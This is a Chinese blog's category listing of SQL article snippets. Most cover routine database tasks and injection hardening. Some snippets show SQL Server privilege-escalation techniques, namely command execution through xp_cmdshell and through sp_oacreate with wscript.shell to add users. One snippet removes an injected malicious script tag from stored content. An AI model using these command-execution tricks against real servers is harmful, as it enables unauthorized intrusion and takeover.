sql
文章平均质量分 62
epzk
一直在模仿,从未被超越!
展开
-
函数 replace 的参数 1 的数据类型 ntext 无效
update Sys_Content set content=replace(content,src=http://cn.daxia123.cn/cn.js>,)SQL提示错误:"函数 replace 的参数 1 的数据类型 ntext 无效。" 解决方法:update Sys_menu set menuContent=replace(cast(menuContent as原创 2009-07-21 23:14:00 · 742 阅读 · 0 评论 -
sqlserver2005连接字符串
Data Source=.;Network Library=DBMSSOCN;Initial Catalog=aa;User ID=aa;Password=aa;原创 2009-09-16 12:55:00 · 397 阅读 · 0 评论 -
sql分页
select top 10 * from product_mainwhere id>all(select top 10 id from product_main order by id)order by id----------------------------------------------------------------------------------------------原创 2009-09-04 12:33:00 · 320 阅读 · 0 评论 -
sql自动备份数据库脚本
BEGIN TRANSACTION DECLARE @JobID BINARY(16) DECLARE @ReturnCode INT SELECT @ReturnCode = 0 IF (SELECT COUNT(*) FROM msdb.dbo.syscategories WHERE name = NDatabase Maintenan原创 2009-09-02 22:06:00 · 781 阅读 · 0 评论 -
sql数据库备份和恢复
一、备份数据库 1、打开SQL企业管理器,在控制台根目录中依次点开Microsoft SQL Server2、SQL Server组-->双击打开你的服务器-->双击打开数据库目录3、选择你的数据库名称(如论坛数据库Forum)-->然后点上面菜单中的工具-->选择备份数据库4、备份选项选择完全备份,目的中的备份到如果原来有路径和名称则选中名称点删除,然后点添加,如果原来没有路径和名称则直接选择添转载 2009-08-30 16:28:00 · 579 阅读 · 1 评论 -
SQL常用语句
1、从一个表里查询数据出来,更新另一个表单数据:update testtable_details set newsid=convert(int,TestTable_keys.val) from testtable_details left join testtable_keys on testtable_details.tid=TestTable_keys.tid 2、一个表的数据,插原创 2009-08-30 15:54:00 · 424 阅读 · 0 评论 -
让3b3.org c.js注入见鬼去吧!
彻底杜绝SQL注入 1.不要使用sa用户连接数据库 2、新建一个public权限数据库用户,并用这个用户访问数据库 3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限 4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×” 5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高): DEC原创 2009-08-19 09:06:00 · 441 阅读 · 0 评论 -
远程连接SQL SERVER 2000服务器方法
需求如下:需要远程连接外地的SQL Server 2000服务器。 测试条件:一个公网IP,两个静态IP。 具体步骤: 一、ping服务器IP能否ping通 观察远程SQL Server 2000服务器的物理连接是否存在。如果不行,请检查,查看配置,当然得确保远程sql server 2000服务器的IP拼写正确。 二 在Dos或命令行下输入telnet 服务器IP原创 2009-07-24 21:26:00 · 604 阅读 · 0 评论 -
SQL注入中利用XP_cmdshell提权的用法
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口转载 2009-07-23 14:07:00 · 4367 阅读 · 1 评论 -
SQL提权常用命令
1、连接数据库driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名 2、添加新用户declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:/windows/sys原创 2009-07-22 17:24:00 · 1989 阅读 · 0 评论 -
Sql批量替换所有表中内容
declare @t varchar(255),@c varchar(255)declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c where a.id=b.id and a.xtype=u and c.name in (char, nchar,原创 2009-07-21 23:12:00 · 744 阅读 · 0 评论 -
Sql批量查看字符所在的表及字段
declare @str varchar(100) set @str=8f8el3l declare @s varchar(8000) declare tb cursor local for select s=if exists(select 1 from [+b.name+] where [+a.n原创 2009-07-21 23:24:00 · 407 阅读 · 0 评论 -
sql批量删除相同前缀的表
declare @tname varchar(20) while(exists(select * from sysobjects where name like a%)) begin select @tname=name from sysobjects where name like a% exec (drop table +@tname) end原创 2009-09-24 10:34:00 · 571 阅读 · 0 评论